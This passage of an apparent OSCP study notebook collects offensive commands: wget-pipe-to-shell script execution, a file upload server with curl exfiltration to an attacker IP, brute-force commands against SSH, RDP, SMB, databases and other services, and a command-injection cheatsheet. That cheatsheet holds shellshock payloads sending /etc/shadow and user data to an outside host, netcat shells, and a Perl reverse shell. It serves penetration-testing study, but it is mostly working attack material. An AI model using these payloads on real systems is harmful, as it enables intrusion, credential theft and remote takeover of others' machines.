Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/) * [WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) * [WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/) * [WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) * [WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) [PreviousKernel Exploitation](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation) [NextManual Exploitaion](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/manual-exploitaion) Last updated 4 years ago --- # Linux post exploitation scripts | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#words-of-wisdom) Words of wisdom ------------------------------------------------------------------------------------------------------------------------------------- **Be careful with what scripts you are executing as auto exploitation is totally restricted in exam and you are going to fail if you done this mistake , even without your intention so ALWAYS first check what you running before executing it , (Must give attention to 'auto-exploitation' word in scripts)** ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#execution-of-script) Execution of script Copy wget http:/// | sh | tee output.txt # This will pull file from attacker box and execute it and also store output to txt file ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#common-location-with-writable-permissions-to-download-and-execute-scripts) Common Location with writable permissions to download and execute scripts Copy /tmp /dev/shm ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#bangenum.sh-initial-linux-enumeration) bangenum.sh (initial linux enumeration) Copy wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh sed -i -e 's/\r$//' bangenum.sh ./bangenum.sh ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#pspy) PSPY What is running, any cron jobs any scripts? Use PSPY to find out Copy https://github.com/DominicBreuker/pspy ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#linux-smart-enumeration) linux-smart-enumeration Copy https://github.com/diego-treitos/linux-smart-enumeration ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#suid-search) SUID search Copy https://github.com/Anon-Exploiter/SUID3NUM ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#xploit_installer.py-exploit-suggester) xploit\_installer.py (exploit suggester) Copy wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py USAGE: xploit_installer.py ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#unix-priv-checker) Unix Priv checker Copy wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#linux-local-enum.sh) linux-local-enum.sh Copy wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#linuxprivchecker.py) linuxprivchecker.py Copy wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#linux-exploit-suggestor.sh) linux-exploit-suggestor.sh Copy wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#unix-privesc-check.sh) unix-privesc-check.sh Copy wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh ### [](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-post-exploitation-scripts#kernelpop) KernelPop Automated kernel vulnerability enumeration and exploitation Copy https://github.com/spencerdodd/kernelpop [PreviousLinux Manual Exploitation](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-commands) [NextKernel Exploitation](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/kernel-exploitation) Last updated 4 years ago --- # General | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general#setup-http-server) Setup HTTP Server ------------------------------------------------------------------------------------------------------- Copy python -m SimpleHTTPServer python3 -m http.server [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general#advance-http-server-supporting-upload-method) Advance http server supporting upload method ------------------------------------------------------------------------------------------------------------------------------------------------------------- * first put this code into py file and save it Copy import SimpleHTTPServer import BaseHTTPServer class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_PUT(self): print self.headers length = int(self.headers["Content-Length"]) path = self.translate_path(self.path) with open(path, "wb") as dst: dst.write(self.rfile.read(length)) if __name__ == '__main__': SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler) * after that run it with **python2** it will spin up the web server on port 8000 , * now you can upload file to attacker box with following command Copy curl -T file http://Attacker-Ip:8000 [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general#temp-file-location) Temp File location --------------------------------------------------------------------------------------------------------- generally temp file has writable permission , so we can use it to downlaod and execute our payloads ### [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general#linux) Linux Copy /tmp /dev/shm ### [](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general#windows) Windows Copy %systemdrive%\Windows\Temp %userprofile%\AppData\Local\Temp [PreviousWindows Exploit Suggester](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester) [NextLinux](https://gabb4r.gitbook.io/oscp-notes/file-transfer/linux) Last updated 4 years ago --- # Brute-force service password | OSCP Notes ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#web) Web Copy hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#logins) Logins Use Burp suite. 1. Intecept a login attempt. 2. Right-lick "Send to intruder". Select Sniper if you have nly one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack. 3. Select your payload, your wordlist. 4. Click attack. 5. Look for response-length that differs from the rest.​ #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#http-basic-auth) HTTP Basic Auth Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h -u -P -M http -m DIR:/path/to/auth -T 10 #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#http-post-form) HTTP - Post Form Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#http-cms-w-ordpress-j-oomla-or-d-rupal-or-m-oodle) HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle Copy cmsmap -f W/J/D/M -u a -p a https://wordpress.com #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#hydra-attack-http-get-401-login-with-a-dictionary) Hydra attack http get 401 login with a dictionary Copy hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#ssh) SSH Copy hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt ssh://$ip Copy hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh Copy hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh Copy hydra -l root -P wordlist.txt $ip ssh Copy hydra -L userlist.txt -P best1050.txt $ip -s 22 ssh -V Copy hydra -l root -P passwords.txt [-t 32] ssh Copy ncrack -p 22 --user root -P passwords.txt [-T 5] Copy medusa -u root -P 500-worst-passwords.txt -h -M ssh ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#snmp) SNMP Copy hydra -P wordlist.txt -v $ip snmp Copy nmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ] Copy onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt Copy hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#remote-desktop-protocol) Remote Desktop Protocol Copy ncrack -vv --user admin -P password-file.txt rdp://$ip Copy ncrack -vv --user -P pwds.txt rdp:// Copy hydra -V -f -L -P rdp://hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#afp) AFP Copy nmap -p 548 --script afp-brute ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#ajp) AJP Copy nmap --script ajp-brute -p 8009 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#cassandra-apache) Cassandra Apache Copy nmap --script cassandra-brute -p 9160 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#couchdb) CouchDB Copy msf> use auxiliary/scanner/couchdb/couchdb_login ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#ftp) FTP Copy hydra -l root -P passwords.txt [-t 32] ftpncrack -p 21 --user root -P passwords.txt [-T 5]medusa -u root -P 500-worst-passwords.txt -h -M ftp ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#imap) IMAP Copy hydra -l USERNAME -P /path/to/passwords.txt -f imap -V​hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V​nmap -sV --script imap-brute -p ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#irc) IRC Copy nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#iscsi) ISCSI Copy nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#ldap) LDAP Copy nmap --script ldap-brute -p 389 Copy hydra -L users.txt -P passwords.txt $ip ldap2 -V -f ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#mongo) Mongo Copy nmap -sV --script mongodb-brute -n -p 27017 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#mysql) MySQL Copy hydra -L usernames.txt -P pass.txt mysql ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#oraclesql) OracleSQL Copy pip3 install cx_Oracle --upgradepatator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 Copy ./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt Copy nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= Copy nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30​john hashes.txt ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#pop3) POP3 Copy hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V Copy hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#postgresql) PostgreSQL Copy hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres Copy medusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres Copy ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt :5432 Copy patator pgsql_login host= user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt Copy nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#pptp) PPTP Copy cat rockyou.txt | thc-pptp-bruter –u ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#redis) Redis Copy nmap --script redis-brute -p 6379 ​hydra –P /path/pass.txt redis ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#rexec) Rexec Copy hydra -l -P rexec:// -v -V ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#rlogin) Rlogin Copy hydra -l -P rlogin:// -v -V ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#rsh) Rsh Copy hydra -L rsh:// -v -V ​[http://pentestmonkey.net/tools/misc/rsh-grind​](http://pentestmonkey.net/tools/misc/rsh-grind%E2%80%8B) ​ ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#rsync) Rsync Copy nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#rtsp) RTSP Copy hydra -l root -P passwords.txt rtsp ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#smb) SMB Copy nmap --script smb-brute -p 445 ​ hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#telnet) Telnet Copy hydra -l root -P passwords.txt [-t 32] telnet​ncrack -p 23 --user root -P passwords.txt [-T 5]​medusa -u root -P 500-worst-passwords.txt -h -M telnet ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#vnc) VNC Copy hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc​medusa -h –u root -P /root/Desktop/pass.txt –M vnc​ncrack -V --user root -P /root/Desktop/pass.txt :>POR>T Copy patator vnc_login host= password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_login Copy nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password#smtp) SMTP Copy hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V [PreviousPost Requests](https://gabb4r.gitbook.io/oscp-notes/web-http/post-requests) [NextCracking Password](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password) Last updated 4 years ago --- # Command injection Cheatsheet | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet#unix) Unix ----------------------------------------------------------------------------------------------- Copy <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> <!--#exec%20cmd="/usr/bin/id;--> <!--#exec%20cmd="/usr/bin/id;--> /index.html|id| ;id; ;id ;netstat -a; ;id; |id |/usr/bin/id |id| |/usr/bin/id| ||/usr/bin/id| |id; ||/usr/bin/id; ;id| ;|/usr/bin/id| \n/bin/ls -al\n \n/usr/bin/id\n \nid\n \n/usr/bin/id; \nid; \n/usr/bin/id| \nid| ;/usr/bin/id\n ;id\n |usr/bin/id\n |nid\n `id` `/usr/bin/id` a);id a;id a);id; a;id; a);id| a;id| a)|id a|id a)|id; a|id |/bin/ls -al a);/usr/bin/id a;/usr/bin/id a);/usr/bin/id; a;/usr/bin/id; a);/usr/bin/id| a;/usr/bin/id| a)|/usr/bin/id a|/usr/bin/id a)|/usr/bin/id; a|/usr/bin/id ;system('cat%20/etc/passwd') ;system('id') ;system('/usr/bin/id') %0Acat%20/etc/passwd %0A/usr/bin/id %0Aid %0A/usr/bin/id%0A %0Aid%0A & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` | id & id ; id %0a id %0a `id` $;/usr/bin/id [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet#windows) Windows ----------------------------------------------------------------------------------------------------- Copy ` || | ; ' '" " "' & && %0a %0a%0d %0Acat%20/etc/passwd %0Aid %0a id %0a %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %0A/usr/bin/id %0A/usr/bin/id%0A %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 %20{${phpinfo()}} %20{${sleep(20)}} %20{${sleep(3)}} a|id| a;id| a;id; a;id\n () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" () { :;}; /bin/bash -c "curl http://[Web IP]/.testing/shellshock.txt?vuln=5" () { :;}; /bin/bash -c "sleep 1 && curl http://[Web IP]/.testing/shellshock.txt?sleep=1&?vuln=6" () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" () { :;}; /bin/bash -c "sleep 3 && curl http://[Web IP]/.testing/shellshock.txt?sleep=3&?vuln=7" () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" () { :;}; /bin/bash -c "sleep 6 && curl http://[Web IP]/.testing/shellshock.txt?sleep=6&?vuln=8" () { :;}; /bin/bash -c "sleep 6 && curl http://[Web IP]/.testing/shellshock.txt?sleep=9&?vuln=9" () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=17?user=\`whoami\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" () { :;}; /bin/bash -c "wget http://[Web IP]/.testing/shellshock.txt?vuln=4" cat /etc/hosts $(`cat /etc/passwd`) cat /etc/passwd () { :;}; curl http://[Web IP]/.testing/shellshock.txt?vuln=12 | curl http://example.com/.testing/rce.txt & curl http://example.com/.testing/rce.txt ; curl https://example.com/.testing/rce_vuln.txt && curl https://example.com/.testing/rce_vuln.txt curl https://example.com/.testing/rce_vuln.txt curl https://example.com/.testing/rce_vuln.txt ||`curl https://example/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt curl https://example.com/.testing/rce_vuln.txt ||`curl https://example/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt $(`curl https://example.com/.testing/rce_vuln.txt?req=22jjffjbn`) dir | dir ; dir $(`dir`) & dir &&dir && dir | dir C:\ ; dir C:\ & dir C:\ && dir C:\ dir C:\ | dir C:\Documents and Settings\* ; dir C:\Documents and Settings\* & dir C:\Documents and Settings\* && dir C:\Documents and Settings\* dir C:\Documents and Settings\* | dir C:\Users ; dir C:\Users & dir C:\Users && dir C:\Users dir C:\Users ;echo%20'' echo ''// XXXXXXXXXXX | echo "" > rfi.php ; echo "" > rfi.php & echo "" > rfi.php && echo "" > rfi.php echo "" > rfi.php | echo "" > dir.php ; echo "" > dir.php & echo "" > dir.php && echo "" > dir.php echo "" > dir.php | echo "" > cmd.php ; echo "" > cmd.php & echo "" > cmd.php && echo "" > cmd.php echo "" > cmd.php ;echo '' echo ''// XXXXXXXXXXX echo ''// XXXXXXXXXXX | echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl ; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl & echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl && echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl () { :;}; echo vulnerable 10 eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') eval('ls') eval('pwd') eval('pwd'); eval('sleep 5') eval('sleep 5'); eval('whoami') eval('whoami'); exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') exec('ls') exec('pwd') exec('pwd'); exec('sleep 5') exec('sleep 5'); exec('whoami') exec('whoami'); ;{$_GET["cmd"]} `id` |id | id ;id ;id| ;id; & id &&id ;id\n ifconfig | ifconfig ; ifconfig & ifconfig && ifconfig /index.html|id| ipconfig | ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all ls $(`ls`) | ls -l / ; ls -l / & ls -l / && ls -l / ls -l / | ls -laR /etc ; ls -laR /etc & ls -laR /etc && ls -laR /etc | ls -laR /var/www ; ls -laR /var/www & ls -laR /var/www && ls -laR /var/www | ls -l /etc/ ; ls -l /etc/ & ls -l /etc/ && ls -l /etc/ ls -l /etc/ ls -lh /etc/ | ls -l /home/* ; ls -l /home/* & ls -l /home/* && ls -l /home/* ls -l /home/* *; ls -lhtR /var/www/ | ls -l /tmp ; ls -l /tmp & ls -l /tmp && ls -l /tmp ls -l /tmp | ls -l /var/www/* ; ls -l /var/www/* & ls -l /var/www/* && ls -l /var/www/* ls -l /var/www/* \n \n\033[2curl http://[Web IP]/.testing/term_escape.txt?vuln=1?user=\`whoami\`\ \n\033[2wget http://[Web 